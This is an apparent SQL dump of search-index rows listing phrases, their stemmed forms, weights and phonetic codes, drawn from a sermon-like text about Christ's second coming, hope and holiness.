(267499, 'christ what', 'christ what', 0, 1, 1.3667, 'C623', 1, '*'),
(267500, 'christ what is', 'christ what is', 0, 1, 1.4667, 'C6232', 1, '*'),
(267501, 'christ will come', 'christ will come', 0, 1, 1.5333, 'C623425', 1, '*'),
(267502, 'christ\'s second', 'christ second', 0, 1, 1.5, 'C623253', 1, '*'),
(267503, 'christ\'s second coming', 'christ second coming', 0, 1, 1.7333, 'C623253252', 1, '*'),
(267504, 'christian and an', 'christian and an', 0, 1, 1.5333, 'C623535', 1, '*'),
(267505, 'church not', 'church not', 0, 1, 1.3333, 'C6253', 1, '*'),
(267506, 'church not having', 'church not having', 0, 1, 1.5667, 'C6253152', 1, '*'),
(267507, 'church of', 'church of', 0, 1, 1.3, 'C621', 1, '*'),
(267508, 'church of christ', 'church of christ', 0, 1, 1.5333, 'C6212623', 1, '*'),
(267509, 'church of jesus', 'church of jesus', 0, 1, 1.5, 'C6212', 1, '*'),
(267510, 'church to wait', 'church to wait', 0, 1, 1.4667, 'C623', 1, '*'),
(267511, 'church “that', 'church “that', 0, 1, 1.4, 'C623', 1, '*'),
(267512, 'church “that he', 'church “that he', 0, 1, 1.5, 'C623', 1, '*'),
(267513, 'cleanse it', 'cleans it', 0, 1, 1.3333, 'C4523', 1, '*'),
(267514, 'cleanse it with', 'cleans it with', 0, 1, 1.5, 'C4523', 1, '*'),
(267515, 'cleanses', 'cleans', 0, 0, 0.5333, 'C452', 1, '*'),
(267516, 'cleanses purifies', 'cleans purifies', 0, 1, 1.5667, 'C4521612', 1, '*'),
(267517, 'cleanses purifies himself', 'cleans purifies himself', 0, 1, 1.8333, 'C45216125241', 1, '*'),
(267518, 'come for us', 'come for us', 0, 1, 1.3667, 'C5162', 1, '*'),
(267519, 'come.”1', 'come.”1', 0, 0, 0.4667, 'C500', 1, '*'),
(267520, 'come.”1 thessalonians', 'come.”1 thessalonians', 0, 1, 1.7, 'C532452', 1, '*'),
(267521, 'come.”1 thessalonians 1', 'come.”1 thessalonians 1', 0, 1, 1.7667, 'C532452', 1, '*'),
(267522, 'cometh', 'cometh', 0, 0, 0.4, 'C530', 1, '*'),
(267523, 'cometh shall', 'cometh shall', 0, 1, 1.4, 'C5324', 1, '*'),
(267524, 'cometh shall find', 'cometh shall find', 0, 1, 1.5667, 'C5324153', 1, '*'),
(267525, 'coming again', 'come again', 0, 1, 1.4, 'C525', 1, '*'),
(267526, 'coming again jesus', 'come again jesus', 0, 1, 1.6, 'C5252', 1, '*'),
(267527, 'coming back', 'come back', 0, 1, 1.3667, 'C5212', 1, '*'),
(267528, 'coming back as', 'come back as', 0, 1, 1.4667, 'C5212', 1, '*'),
(267529, 'coming back for', 'come back for', 0, 1, 1.5, 'C521216', 1, '*'),
(267530, 'coming is', 'come is', 0, 1, 1.3, 'C520', 1, '*'),
(267531, 'coming is worth', 'come is worth', 0, 1, 1.5, 'C5263', 1, '*'),
(267532, 'coming must', 'come must', 0, 1, 1.3667, 'C52523', 1, '*'),
(267533, 'coming must live', 'come must live', 0, 1, 1.5333, 'C5252341', 1, '*'),
(267534, 'coming of christ', 'come of christ', 0, 1, 1.5333, 'C5212623', 1, '*'),
(267535, 'coming of the', 'come of the', 0, 1, 1.4333, 'C5213', 1, '*'),
(267536, 'coming or', 'come or', 0, 1, 1.3, 'C526', 1, '*'),
(267537, 'coming or not', 'come or not', 0, 1, 1.4333, 'C52653', 1, '*'),
(267538, 'condemnation', 'condemn', 0, 0, 0.8, 'C53535', 1, '*'),
(267539, 'condemnation be', 'condemn be', 0, 1, 1.5, 'C535351', 1, '*'),
(267540, 'condemnation be glory', 'condemn be glory', 0, 1, 1.7, 'C535351246', 1, '*'),
(267541, 'condition that', 'condit that', 0, 1, 1.4667, 'C5353', 1, '*'),
(267542, 'condition that you', 'condit that you', 0, 1, 1.6, 'C5353', 1, '*'),
(267543, 'consciousness', 'conscious', 0, 0, 0.8667, 'C5252', 2, '*'),
(267544, 'consciousness makes', 'conscious makes', 0, 1, 1.6333, 'C525252', 1, '*'),
(267545, 'consciousness makes you', 'conscious makes you', 0, 1, 1.7667, 'C525252', 1, '*'),
(267546, 'consciousness that', 'conscious that', 0, 1, 1.6, 'C52523', 1, '*'),
(267547, 'consciousness that our', 'conscious that our', 0, 1, 1.7333, 'C525236', 1, '*'),
(267548, 'conviction', 'convict', 0, 0, 0.6667, 'C51235', 1, '*'),
(267549, 'conviction that', 'convict that', 0, 1, 1.5, 'C512353', 1, '*'),
(267550, 'conviction that jesus', 'convict that jesus', 0, 1, 1.7, 'C5123532', 1, '*'),
(267551, 'cor 1 17-18', 'cor 1 17-18', 0, 1, 1.3667, 'C600', 1, '*'),
(267552, 'day sooner', 'dai sooner', 0, 1, 1.3333, 'D256', 1, '*'),
(267553, 'day sooner or', 'dai sooner or', 0, 1, 1.4333, 'D256', 1, '*'),
(267554, 'days will', 'dai will', 0, 1, 1.3, 'D240', 1, '*'),
(267555, 'days will certainly', 'dai will certainly', 0, 1, 1.6333, 'D2426354', 1, '*'),
(267556, 'dead even', 'dead even', 0, 1, 1.3, 'D150', 1, '*'),
(267557, 'dead even jesus', 'dead even jesus', 0, 1, 1.5, 'D152', 1, '*'),
(267558, 'deep conviction', 'deep conviction', 0, 1, 1.5, 'D1251235', 1, '*'),
(267559, 'deep conviction that', 'deep conviction that', 0, 1, 1.6667, 'D12512353', 1, '*'),
(267560, 'delivered us', 'deliv us', 0, 1, 1.4, 'D41632', 1, '*'),
(267561, 'delivered us from', 'deliv us from', 0, 1, 1.5667, 'D41632165', 1, '*'),
(267562, 'demanded of the', 'demand of the', 0, 1, 1.5, 'D5313', 1, '*'),
(267563, 'determine the state', 'determin the state', 0, 1, 1.6333, 'D65323', 1, '*'),
(267564, 'disparity', 'dispar', 0, 0, 0.6, 'D2163', 1, '*'),
(267565, 'disparity between', 'dispar between', 0, 1, 1.5667, 'D2163135', 1, '*'),
(267566, 'disparity between a', 'dispar between a', 0, 1, 1.6333, 'D2163135', 1, '*'),
(267567, 'do you relate', 'do you relate', 0, 1, 1.4333, 'D643', 1, '*'),
(267568, 'doing luke', 'do luke', 0, 1, 1.3333, 'D5242', 1, '*'),
(267569, 'doing luke 12', 'do luke 12', 0, 1, 1.4333, 'D5242', 1, '*'),
(267570, 'don\'t tell', 'don tell', 0, 1, 1.3333, 'D534', 1, '*'),
(267571, 'don\'t tell someone', 'don tell someone', 0, 1, 1.6, 'D53425', 1, '*'),
(267572, 'doth', 'doth', 0, 0, 0.2667, 'D000', 2, '*'),
(267573, 'doth the', 'doth the', 0, 1, 1.2667, 'D000', 2, '*'),
(267574, 'doth the ministration', 'doth the ministration', 0, 1, 1.7, 'D523635', 1, '*'),
(267575, 'end-time', 'end-tim', 0, 0, 0.5333, 'E535', 1, '*'),
(267576, 'end-time the', 'end-tim the', 0, 1, 1.4, 'E5353', 1, '*'),
(267577, 'end-time the major', 'end-tim the major', 0, 1, 1.6, 'E5353526', 1, '*'),
(267578, 'endlessly', 'endlessli', 0, 0, 0.6, 'E53424', 1, '*'),
(267579, 'endlessly for', 'endlessli for', 0, 1, 1.4333, 'E5342416', 1, '*'),
(267580, 'endlessly for somebody', 'endlessli for somebody', 0, 1, 1.7333, 'E53424162513', 1, '*'),
(267581, 'ephesians 5', 'ephesian 5', 0, 1, 1.3667, 'E1252', 1, '*'),
(267582, 'ephesians 5 26-26', 'ephesian 5 26-26', 0, 1, 1.5667, 'E1252', 1, '*'),
(267583, 'especially in', 'especi in', 0, 1, 1.4333, 'E21245', 1, '*'),
(267584, 'especially in these', 'especi in these', 0, 1, 1.6333, 'E2124532', 1, '*'),
(267585, 'even jesus which', 'even jesus which', 0, 1, 1.5333, 'E152', 1, '*'),
(267586, 'every member of', 'everi member of', 0, 1, 1.5, 'E165161', 1, '*'),
(267587, 'everyday with', 'everydai with', 0, 1, 1.4333, 'E163', 1, '*'),
(267588, 'everyday with the', 'everydai with the', 0, 1, 1.5667, 'E163', 1, '*'),
(267589, 'everyone that is', 'everyon that is', 0, 1, 1.5333, 'E16532', 2, '*'),
(267590, 'everyone who', 'everyon who', 0, 1, 1.4, 'E165', 1, '*'),
(267591, 'everyone who has', 'everyon who has', 0, 1, 1.5333, 'E1652', 1, '*'),
(267592, 'exceed', 'exce', 0, 0, 0.4, 'E230', 1, '*'),
(267593, 'exceed in', 'exce in', 0, 1, 1.3, 'E235', 1, '*'),
(267594, 'exceed in glory', 'exce in glory', 0, 1, 1.5, 'E235246', 1, '*'),
(267595, 'expecting', 'expect', 0, 0, 0.6, 'E212352', 1, '*'),
(267596, 'expecting you', 'expect you', 0, 1, 1.4333, 'E212352', 1, '*'),
(267597, 'expecting you to', 'expect you to', 0, 1, 1.5333, 'E2123523', 1, '*'),
(267598, 'eyes shall', 'ey shall', 0, 1, 1.3333, 'E240', 1, '*'),
(267599, 'eyes shall see', 'ey shall see', 0, 1, 1.4667, 'E242', 1, '*'),
(267600, 'find him', 'find him', 0, 1, 1.2667, 'F535', 1, '*'),
(267601, 'find him so', 'find him so', 0, 1, 1.3667, 'F5352', 1, '*'),
(267602, 'for him it', 'for him it', 0, 1, 1.3333, 'F653', 1, '*'),
(267603, 'for him why', 'for him why', 0, 1, 1.3667, 'F650', 1, '*'),
(267604, 'for his second', 'for his second', 0, 1, 1.4667, 'F6253', 1, '*'),
(267605, 'for his son', 'for his son', 0, 1, 1.3667, 'F625', 1, '*'),
(267606, 'for live', 'for live', 0, 1, 1.2667, 'F641', 1, '*'),
(267607, 'for live everyday', 'for live everyday', 0, 1, 1.5667, 'F64163', 1, '*'),
(267608, 'for somebody', 'for somebody', 0, 1, 1.4, 'F62513', 2, '*'),
(267609, 'for somebody that', 'for somebody that', 0, 1, 1.5667, 'F62513', 1, '*'),
(267610, 'for the backsliders', 'for the backsliders', 0, 1, 1.6333, 'F63124362', 1, '*'),
(267611, 'for the coming', 'for the coming', 0, 1, 1.4667, 'F63252', 1, '*'),
(267612, 'for the hypocrite', 'for the hypocrite', 0, 1, 1.5667, 'F631263', 1, '*'),
(267613, 'for the saints', 'for the saints', 0, 1, 1.4667, 'F632532', 1, '*'),
(267614, 'for those', 'for those', 0, 1, 1.3, 'F632', 1, '*'),
(267615, 'for those living', 'for those living', 0, 1, 1.5333, 'F6324152', 1, '*'),
(267616, 'for us “there', 'for us “there', 0, 1, 1.4333, 'F6236', 1, '*'),
(267617, 'form “all', 'form “all', 0, 1, 1.3, 'F654', 1, '*'),
(267618, 'form “all the', 'form “all the', 0, 1, 1.4333, 'F6543', 1, '*'),
(267619, 'from heaven whom', 'from heaven whom', 0, 1, 1.5333, 'F6515', 1, '*'),
(267620, 'from the love', 'from the love', 0, 1, 1.4333, 'F65341', 1, '*'),
(267621, 'from the wrath', 'from the wrath', 0, 1, 1.4667, 'F65363', 1, '*'),
(267622, 'future and there', 'futur and there', 0, 1, 1.5333, 'F36536', 1, '*'),
(267623, 'future in our', 'futur in our', 0, 1, 1.4333, 'F3656', 1, '*'),
(267624, 'gave himselffor', 'gave himselffor', 0, 1, 1.5, 'G152416', 1, '*'),
(267625, 'gave himselffor the', 'gave himselffor the', 0, 1, 1.6333, 'G1524163', 1, '*'),
(267626, 'glorious church', 'gloriou church', 0, 1, 1.5, 'G46262', 1, '*'),
(267627, 'glorious church not', 'gloriou church not', 0, 1, 1.6333, 'G4626253', 1, '*'),
(267628, 'glory if', 'glori if', 0, 1, 1.2667, 'G461', 1, '*'),
(267629, 'glory if in', 'glori if in', 0, 1, 1.3667, 'G4615', 1, '*'),
(267630, 'glory much', 'glori much', 0, 1, 1.3333, 'G4652', 1, '*'),
(267631, 'glory much more', 'glori much more', 0, 1, 1.5, 'G465256', 1, '*'),
(267632, 'god and testimony', 'god and testimony', 0, 1, 1.5667, 'G353235', 1, '*'),
(267633, 'guiltless', 'guiltless', 0, 0, 0.6, 'G4342', 2, '*'),
(267634, 'guiltless 1', 'guiltless 1', 0, 1, 1.3667, 'G4342', 1, '*'),
(267635, 'guiltless 1 john', 'guiltless 1 john', 0, 1, 1.5333, 'G43425', 1, '*'),
(267636, 'has not abandoned', 'ha not abandoned', 0, 1, 1.5667, 'H25315353', 1, '*'),
(267637, 'has this', 'ha this', 0, 1, 1.2667, 'H232', 1, '*'),
(267638, 'has this hope', 'ha this hope', 0, 1, 1.4333, 'H2321', 1, '*'),
(267639, 'having spot', 'have spot', 0, 1, 1.3667, 'H15213', 1, '*'),
(267640, 'having spot or', 'have spot or', 0, 1, 1.4667, 'H152136', 1, '*'),
(267641, 'he admonished', 'he admonished', 0, 1, 1.4333, 'H3523', 1, '*'),
(267642, 'he admonished the', 'he admonished the', 0, 1, 1.5667, 'H3523', 1, '*'),
(267643, 'he is coming', 'he is coming', 0, 1, 1.4, 'H252', 1, '*'),
(267644, 'he is pure', 'he is pure', 0, 1, 1.3333, 'H216', 1, '*'),
(267645, 'he left', 'he left', 0, 1, 1.2333, 'H413', 1, '*'),
(267646, 'he left in', 'he left in', 0, 1, 1.3333, 'H4135', 1, '*'),
(267647, 'he might', 'he might', 0, 1, 1.2667, 'H523', 1, '*'),
(267648, 'he might present', 'he might present', 0, 1, 1.5333, 'H52316253', 1, '*'),
(267649, 'he might sanctify', 'he might sanctify', 0, 1, 1.5667, 'H52325231', 1, '*'),
(267650, 'he raised', 'he raised', 0, 1, 1.3, 'H623', 1, '*'),
(267651, 'he raised from', 'he raised from', 0, 1, 1.4667, 'H623165', 1, '*'),
(267652, 'he\'s expecting', 'he expecting', 0, 1, 1.4667, 'H212352', 1, '*'),
(267653, 'he\'s expecting you', 'he expecting you', 0, 1, 1.6, 'H212352', 1, '*'),
(267654, 'he\'s not coming', 'he not coming', 0, 1, 1.5, 'H253252', 1, '*'),
(267655, 'heaven whom', 'heaven whom', 0, 1, 1.3667, 'H150', 1, '*'),
(267656, 'heaven whom he', 'heaven whom he', 0, 1, 1.4667, 'H150', 1, '*'),
(267657, 'him cleanses', 'him cleanses', 0, 1, 1.4, 'H52452', 1, '*'),
(267658, 'him cleanses purifies', 'him cleanses purifies', 0, 1, 1.7, 'H524521612', 1, '*'),
(267659, 'him it', 'him it', 0, 1, 1.2, 'H530', 1, '*'),
(267660, 'him it is', 'him it is', 0, 1, 1.3, 'H532', 1, '*'),
(267661, 'him so', 'him so', 0, 1, 1.2, 'H520', 1, '*'),
(267662, 'him so doing', 'him so doing', 0, 1, 1.4, 'H52352', 1, '*'),
(267663, 'him why', 'him why', 0, 1, 1.2333, 'H500', 1, '*'),
(267664, 'him why because', 'him why because', 0, 1, 1.5, 'H512', 1, '*'),
(267665, 'himself a glorious', 'himself a glorious', 0, 1, 1.6, 'H52412462', 1, '*'),
(267666, 'himself just', 'himself just', 0, 1, 1.4, 'H524123', 1, '*'),
(267667, 'himself just as', 'himself just as', 0, 1, 1.5, 'H5241232', 1, '*'),
(267668, 'himselffor', 'himselffor', 0, 0, 0.6667, 'H52416', 1, '*'),
(267669, 'himselffor the', 'himselffor the', 0, 1, 1.4667, 'H524163', 1, '*'),
(267670, 'himselffor the church', 'himselffor the church', 0, 1, 1.7, 'H524163262', 1, '*'),
(267671, 'him”.', 'him”.', 0, 0, 0.3333, 'H500', 1, '*'),
(267672, 'him”. there', 'him”. there', 0, 1, 1.3667, 'H536', 1, '*'),
(267673, 'him”. there may', 'him”. there may', 0, 1, 1.5, 'H5365', 1, '*'),
(267674, 'his deep', 'hi deep', 0, 1, 1.2667, 'H231', 1, '*'),
(267675, 'his deep conviction', 'hi deep conviction', 0, 1, 1.6333, 'H231251235', 1, '*'),
(267676, 'his second', 'hi second', 0, 1, 1.3333, 'H253', 1, '*'),
(267677, 'his second coming', 'hi second coming', 0, 1, 1.5667, 'H253252', 1, '*'),
(267678, 'his son from', 'hi son from', 0, 1, 1.4, 'H25165', 1, '*'),
(267679, 'holiness demanded', 'holi demanded', 0, 1, 1.5667, 'H452353', 1, '*'),
(267680, 'holiness demanded of', 'holi demanded of', 0, 1, 1.6667, 'H4523531', 1, '*'),
(267681, 'holiness is', 'holi is', 0, 1, 1.3667, 'H452', 1, '*'),
(267682, 'holiness is a', 'holi is a', 0, 1, 1.4333, 'H452', 1, '*'),
(267683, 'holy and', 'holi and', 0, 1, 1.2667, 'H453', 1, '*'),
(267684, 'holy and live', 'holi and live', 0, 1, 1.4333, 'H45341', 1, '*'),
(267685, 'holy and without', 'holi and without', 0, 1, 1.5333, 'H453', 1, '*'),
(267686, 'hope for', 'hope for', 0, 1, 1.2667, 'H160', 1, '*'),
(267687, 'hope for the', 'hope for the', 0, 1, 1.4, 'H163', 1, '*'),
(267688, 'hope in', 'hope in', 0, 1, 1.2333, 'H150', 1, '*'),
(267689, 'hope in our', 'hope in our', 0, 1, 1.3667, 'H156', 1, '*'),
(267690, 'hope is', 'hope is', 0, 1, 1.2333, 'H120', 1, '*'),
(267691, 'hope is not', 'hope is not', 0, 1, 1.3667, 'H1253', 1, '*'),
(267692, 'hope of', 'hope of', 0, 1, 1.2333, 'H100', 1, '*'),
(267693, 'hope of christ', 'hope of christ', 0, 1, 1.4667, 'H12623', 1, '*'),
(267694, 'hope of christ\'s', 'hope of christ', 0, 1, 1.5333, 'H126232', 1, '*'),
(267695, 'hope of waiting', 'hope of waiting', 0, 1, 1.5, 'H1352', 1, '*'),
(267696, 'hope resting', 'hope resting', 0, 1, 1.4, 'H162352', 1, '*'),
(267697, 'hope resting on', 'hope resting on', 0, 1, 1.5, 'H1623525', 1, '*'),
(267698, 'hope you', 'hope you', 0, 1, 1.2667, 'H100', 1, '*'),
(267699, 'hope you don\'t', 'hope you don', 0, 1, 1.4667, 'H1353', 1, '*'),
(267700, 'hopefulness', 'hope', 0, 0, 0.7333, 'H1452', 1, '*'),
(267701, 'hopefulness that', 'hope that', 0, 1, 1.5333, 'H14523', 1, '*'),
(267702, 'hopefulness that one', 'hope that one', 0, 1, 1.6667, 'H145235', 1, '*'),
(267703, 'hopeless', 'hopeless', 0, 0, 0.5333, 'H142', 1, '*'),
(267704, 'hopeless 1', 'hopeless 1', 0, 1, 1.3333, 'H142', 1, '*'),
(267705, 'hopeless 1 cor', 'hopeless 1 cor', 0, 1, 1.4667, 'H1426', 1, '*'),
(267706, 'hopeless hope', 'hopeless hope', 0, 1, 1.4333, 'H1421', 1, '*'),
(267707, 'hopeless hope you', 'hopeless hope you', 0, 1, 1.5667, 'H1421', 1, '*'),
(267708, 'hopes', 'hope', 0, 0, 0.3333, 'H120', 1, '*'),
(267709, 'hopes in', 'hope in', 0, 1, 1.2667, 'H125', 1, '*'),
(267710, 'hopes in the', 'hope in the', 0, 1, 1.4, 'H1253', 1, '*'),
(267711, 'hope”.', 'hope”.', 0, 0, 0.4, 'H100', 1, '*'),
(267712, 'hope”. an', 'hope”. an', 0, 1, 1.3, 'H150', 1, '*'),
(267713, 'hope”. an unbeliever', 'hope”. an unbeliever', 0, 1, 1.6667, 'H151416', 1, '*'),
(267714, 'hoping', 'hope', 0, 0, 0.4, 'H152', 1, '*'),
(267715, 'hoping for', 'hope for', 0, 1, 1.3333, 'H15216', 1, '*'),
(267716, 'hoping for him', 'hope for him', 0, 1, 1.4667, 'H152165', 1, '*'),
(267717, 'hoping for the', 'hope for the', 0, 1, 1.4667, 'H152163', 1, '*'),
(267718, 'hypocrite', 'hypocrit', 0, 0, 0.6, 'H1263', 1, '*'),
(267719, 'hypocrite and', 'hypocrit and', 0, 1, 1.4333, 'H126353', 1, '*'),
(267720, 'hypocrite and he\'s', 'hypocrit and he', 0, 1, 1.6, 'H1263532', 1, '*'),
(267721, 'if in', 'if in', 0, 1, 1.1667, 'I150', 1, '*'),
(267722, 'if in the', 'if in the', 0, 1, 1.3, 'I153', 1, '*'),
(267723, 'if the ministration', 'if the ministration', 0, 1, 1.6333, 'I13523635', 1, '*'),
(267724, 'in all this', 'in all this', 0, 1, 1.3667, 'I5432', 1, '*'),
(267725, 'in glory if', 'in glory if', 0, 1, 1.3667, 'I52461', 1, '*'),
(267726, 'in our future', 'in our future', 0, 1, 1.4333, 'I56136', 1, '*'),
(267727, 'in our hope”.', 'in our hope”.', 0, 1, 1.4333, 'I561', 1, '*'),
(267728, 'in our text', 'in our text', 0, 1, 1.3667, 'I56323', 1, '*'),
(267729, 'in physical form', 'in physical form', 0, 1, 1.5333, 'I5124165', 1, '*'),
(267730, 'in sin', 'in sin', 0, 1, 1.2, 'I525', 1, '*'),
(267731, 'in sin he', 'in sin he', 0, 1, 1.3, 'I525', 1, '*'),
(267732, 'in such', 'in such', 0, 1, 1.2333, 'I520', 1, '*'),
(267733, 'in such a', 'in such a', 0, 1, 1.3, 'I520', 1, '*'),
(267734, 'in the hopefulness', 'in the hopefulness', 0, 1, 1.6, 'I531452', 1, '*'),
(267735, 'in the second', 'in the second', 0, 1, 1.4333, 'I53253', 1, '*'),
(267736, 'in to be', 'in to be', 0, 1, 1.2667, 'I531', 1, '*'),
(267737, 'inseparable', 'insepar', 0, 0, 0.7333, 'I521614', 1, '*'),
(267738, 'inseparable from', 'insepar from', 0, 1, 1.5333, 'I521614165', 1, '*'),
(267739, 'inseparable from the', 'insepar from the', 0, 1, 1.6667, 'I5216141653', 1, '*'),
(267740, 'interesting', 'interest', 0, 0, 0.7333, 'I5362352', 1, '*'),
(267741, 'interesting to', 'interest to', 0, 1, 1.4667, 'I53623523', 1, '*'),
(267742, 'interesting to know', 'interest to know', 0, 1, 1.6333, 'I5362352325', 1, '*'),
(267743, 'into if', 'into if', 0, 1, 1.2333, 'I531', 1, '*'),
(267744, 'into if you', 'into if you', 0, 1, 1.3667, 'I531', 1, '*'),
(267745, 'is a condition', 'is a condition', 0, 1, 1.4667, 'I2535', 1, '*'),
(267746, 'is a shadow', 'is a shadow', 0, 1, 1.3667, 'I230', 1, '*'),
(267747, 'is a standard', 'is a standard', 0, 1, 1.4333, 'I235363', 1, '*'),
(267748, 'is a state', 'is a state', 0, 1, 1.3333, 'I230', 1, '*'),
(267749, 'is coming again', 'is coming again', 0, 1, 1.5, 'I2525', 1, '*'),
(267750, 'is coming back', 'is coming back', 0, 1, 1.4667, 'I25212', 1, '*'),
(267751, 'is coming or', 'is coming or', 0, 1, 1.4, 'I2526', 1, '*'),
(267752, 'is future', 'is future', 0, 1, 1.3, 'I2136', 1, '*'),
(267753, 'is future in', 'is future in', 0, 1, 1.4, 'I21365', 1, '*'),
(267754, 'is hope in', 'is hope in', 0, 1, 1.3333, 'I215', 1, '*'),
(267755, 'is hoping', 'is hoping', 0, 1, 1.3, 'I2152', 1, '*'),
(267756, 'is hoping for', 'is hoping for', 0, 1, 1.4333, 'I215216', 1, '*'),
(267757, 'is interesting', 'is interesting', 0, 1, 1.4667, 'I25362352', 1, '*'),
(267758, 'is interesting to', 'is interesting to', 0, 1, 1.5667, 'I253623523', 1, '*'),
(267759, 'is pure', 'is pure', 0, 1, 1.2333, 'I216', 1, '*'),
(267760, 'is pure chaste', 'is pure chaste', 0, 1, 1.4667, 'I21623', 1, '*'),
(267761, 'is purity', 'is purity', 0, 1, 1.3, 'I2163', 1, '*'),
(267762, 'is purity and', 'is purity and', 0, 1, 1.4333, 'I216353', 1, '*'),
(267763, 'is should', 'is should', 0, 1, 1.3, 'I243', 1, '*'),
(267764, 'is should be', 'is should be', 0, 1, 1.4, 'I2431', 1, '*'),
(267765, 'is somehow', 'is somehow', 0, 1, 1.3333, 'I250', 1, '*'),
(267766, 'is somehow hopeless', 'is somehow hopeless', 0, 1, 1.6333, 'I25142', 1, '*'),
(267767, 'is still coming', 'is still coming', 0, 1, 1.5, 'I234252', 1, '*'),
(267768, 'is why christ', 'is why christ', 0, 1, 1.4333, 'I2623', 1, '*'),
(267769, 'is worth', 'is worth', 0, 1, 1.2667, 'I263', 1, '*'),
(267770, 'is worth waiting', 'is worth waiting', 0, 1, 1.5333, 'I26352', 1, '*'),
(267771, 'is your present', 'is your present', 0, 1, 1.5, 'I2616253', 1, '*'),
(267772, 'it is interesting', 'it is interesting', 0, 1, 1.5667, 'I325362352', 1, '*'),
(267773, 'it to himself', 'it to himself', 0, 1, 1.4333, 'I35241', 1, '*'),
(267774, 'it with', 'it with', 0, 1, 1.2333, 'I300', 1, '*'),
(267775, 'it with the', 'it with the', 0, 1, 1.3667, 'I300', 1, '*'),
(267776, 'item 14', 'item 14', 0, 1, 1.2333, 'I350', 1, '*'),
(267777, 'item 14 the', 'item 14 the', 0, 1, 1.3667, 'I353', 1, '*'),
(267778, 'jesus christ especially', 'jesu christ especially', 0, 1, 1.7667, 'J6232124', 1, '*'),
(267779, 'jesus christ this', 'jesu christ this', 0, 1, 1.5667, 'J6232', 1, '*'),
(267780, 'jesus is', 'jesu is', 0, 1, 1.2667, 'J000', 3, '*'),
(267781, 'jesus is coming', 'jesu is coming', 0, 1, 1.5, 'J520', 1, '*'),
(267782, 'jesus is not', 'jesu is not', 0, 1, 1.4, 'J530', 1, '*'),
(267783, 'jesus is still', 'jesu is still', 0, 1, 1.4667, 'J340', 1, '*'),
(267784, 'jesus which', 'jesu which', 0, 1, 1.3667, 'J000', 1, '*'),
(267785, 'jesus which delivered', 'jesu which delivered', 0, 1, 1.7, 'J34163', 1, '*'),
(267786, 'john 3 3', 'john 3 3', 0, 1, 1.2667, 'J500', 1, '*'),
(267787, 'just as he', 'just as he', 0, 1, 1.3333, 'J320', 1, '*'),
(267788, 'k2 item 14', 'k2 item 14', 0, 1, 1.3333, 'K350', 1, '*'),
(267789, 'know that jesus', 'know that jesus', 0, 1, 1.5, 'K532', 1, '*'),
(267790, 'last days will', 'last days will', 0, 1, 1.4667, 'L2324', 1, '*'),
(267791, 'later christ', 'later christ', 0, 1, 1.4, 'L362623', 1, '*'),
(267792, 'later christ will', 'later christ will', 0, 1, 1.5667, 'L3626234', 1, '*'),
(267793, 'learn patience', 'learn patience', 0, 1, 1.4667, 'L651352', 1, '*'),
(267794, 'learn patience that', 'learn patience that', 0, 1, 1.6333, 'L6513523', 1, '*'),
(267795, 'left in', 'left in', 0, 1, 1.2333, 'L135', 1, '*'),
(267796, 'left in physical', 'left in physical', 0, 1, 1.5333, 'L135124', 1, '*'),
(267797, 'let every', 'let every', 0, 1, 1.3, 'L316', 1, '*'),
(267798, 'let every member', 'let every member', 0, 1, 1.5333, 'L316516', 1, '*'),
(267799, 'live everyday', 'live everyday', 0, 1, 1.4333, 'L163', 1, '*'),
(267800, 'live everyday with', 'live everyday with', 0, 1, 1.6, 'L163', 1, '*'),
(267801, 'live holy', 'live holy', 0, 1, 1.3, 'L140', 1, '*'),
(267802, 'live holy and', 'live holy and', 0, 1, 1.4333, 'L1453', 1, '*'),
(267803, 'live pure', 'live pure', 0, 1, 1.3, 'L160', 1, '*'),
(267804, 'live ready', 'live ready', 0, 1, 1.3333, 'L163', 1, '*'),
(267805, 'live ready in', 'live ready in', 0, 1, 1.4333, 'L1635', 1, '*'),
(267806, 'live ready live', 'live ready live', 0, 1, 1.5, 'L16341', 1, '*'),
(267807, 'living in sin', 'live in sin', 0, 1, 1.4333, 'L152525', 1, '*'),
(267808, 'living with', 'live with', 0, 1, 1.3667, 'L1523', 1, '*'),
(267809, 'living with this', 'live with this', 0, 1, 1.5333, 'L15232', 1, '*'),
(267810, 'lord cometh', 'lord cometh', 0, 1, 1.3667, 'L63253', 1, '*'),
(267811, 'lord cometh shall', 'lord cometh shall', 0, 1, 1.5667, 'L6325324', 1, '*'),
(267812, 'lord he admonished', 'lord he admonished', 0, 1, 1.6, 'L63523', 1, '*'),
(267813, 'lord will soon', 'lord will soon', 0, 1, 1.4667, 'L63425', 1, '*'),
(267814, 'love of', 'love of', 0, 1, 1.2333, 'L100', 1, '*'),
(267815, 'love of christ', 'love of christ', 0, 1, 1.4667, 'L12623', 1, '*'),
(267816, 'luke 12', 'luke 12', 0, 1, 1.2333, 'L200', 1, '*'),
(267817, 'luke 12 43', 'luke 12 43', 0, 1, 1.3333, 'L200', 1, '*'),
(267818, 'made was', 'made was', 0, 1, 1.2667, 'M320', 1, '*'),
(267819, 'made was born', 'made was born', 0, 1, 1.4333, 'M32165', 1, '*'),
(267820, 'major disparity', 'major disparity', 0, 1, 1.5, 'M2632163', 1, '*'),
(267821, 'major disparity between', 'major disparity between', 0, 1, 1.7667, 'M2632163135', 1, '*'),
(267822, 'makes you inseparable', 'make you inseparable', 0, 1, 1.7, 'M2521614', 1, '*'),
(267823, 'may be tribulation', 'mai be tribulation', 0, 1, 1.6, 'M1361435', 1, '*'),
(267824, 'member of', 'member of', 0, 1, 1.3, 'M161', 1, '*'),
(267825, 'member of the', 'member of the', 0, 1, 1.4333, 'M1613', 1, '*'),
(267826, 'might present', 'might present', 0, 1, 1.4333, 'M2316253', 1, '*'),
(267827, 'might present it', 'might present it', 0, 1, 1.5333, 'M2316253', 1, '*'),
(267828, 'might sanctify', 'might sanctify', 0, 1, 1.4667, 'M2325231', 1, '*'),
(267829, 'might sanctify and', 'might sanctify and', 0, 1, 1.6, 'M232523153', 1, '*'),
(267830, 'ministration', 'ministr', 0, 0, 0.8, 'M23635', 1, '*'),
(267831, 'ministration of', 'ministr of', 0, 1, 1.5, 'M236351', 1, '*'),
(267832, 'ministration of condemnation', 'ministr of condemnation', 0, 1, 1.9333, 'M236351253535', 1, '*'),
(267833, 'ministration of righteousness', 'ministr of righteousness', 0, 1, 1.9667, 'M236351623252', 1, '*'),
(267834, 'more doth', 'more doth', 0, 1, 1.3, 'M630', 1, '*'),
(267835, 'more doth the', 'more doth the', 0, 1, 1.4333, 'M630', 1, '*'),
(267836, 'more is', 'more is', 0, 1, 1.2333, 'M620', 1, '*'),
(267837, 'more is purity', 'more is purity', 0, 1, 1.4667, 'M62163', 1, '*'),
